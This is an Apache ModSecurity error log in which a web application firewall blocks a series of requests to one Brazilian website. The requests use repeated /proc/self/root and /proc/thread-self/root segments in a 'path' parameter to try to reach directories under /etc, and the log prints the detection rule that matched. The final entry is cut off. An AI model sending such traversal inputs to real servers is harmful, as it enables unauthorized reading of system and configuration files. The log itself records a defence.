[Mon Mar 16 16:57:45.576603 2026] [:error] [pid 29507:tid 140411599251200] [client 74.7.243.203:56100] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhguUr9dMAiw-8KANNccwAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:57:45.658917 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.241.46:52776] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhguaQpVkWug9HeOt9KWwAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:46.875043 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.241.46:52782] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgulajLEzk2WiQ-10n3gAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:48.269038 2026] [:error] [pid 29802:tid 140411565680384] [client 74.7.241.46:45448] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgvM_BxrYCr4hPDw_-3AAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:49.473450 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.241.46:45452] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgvbysWC90G-1nBrBYhAAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:50.290212 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.243.203:59608] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgvrysWC90G-1nBrBYhwAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:57:50.830428 2026] [:error] [pid 14895:tid 140411624429312] [client 74.7.241.46:45462] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgvlajLEzk2WiQ-10n4gAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:51.669401 2026] [:error] [pid 29507:tid 140411683178240] [client 74.7.243.203:57850] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgv0r9dMAiw-8KANNcdQAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:57:52.010795 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:45466] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgwP9ocpUE4ed4uDwHdwAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:53.417168 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.241.46:45470] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgwdSswJuvopo3lOh0NwAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:55.738146 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.241.46:45480] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgw_9ocpUE4ed4uDwHegAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:58.063649 2026] [:error] [pid 15061:tid 140411590858496] [client 74.7.241.46:45484] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgxaTCbgAP5jq5TehBiwAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:00.342840 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.241.46:33552] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgx6QpVkWug9HeOt9KaQAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:01.718788 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.241.46:33558] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgydSswJuvopo3lOh0PAAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:02.931592 2026] [:error] [pid 29507:tid 140411557287680] [client 74.7.241.46:33568] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgykr9dMAiw-8KANNcdwAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:04.375394 2026] [:error] [pid 15061:tid 140411641214720] [client 74.7.241.46:33574] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgzKTCbgAP5jq5TehBjgAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:06.687739 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.241.46:33586] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgzqQpVkWug9HeOt9KeAAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:08.048770 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.241.46:33602] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhg0NSswJuvopo3lOh0QgAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:09.302001 2026] [:error] [pid 29507:tid 140411590858496] [client 74.7.241.46:45380] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhg0Ur9dMAiw-8KANNceQAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:12.033953 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.241.46:45396] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhg1Er9dMAiw-8KANNcfQAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:13.380888 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.241.46:45406] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhg1Y6lpbStxTqkSkt_dwAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:14.572065 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:45420] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] 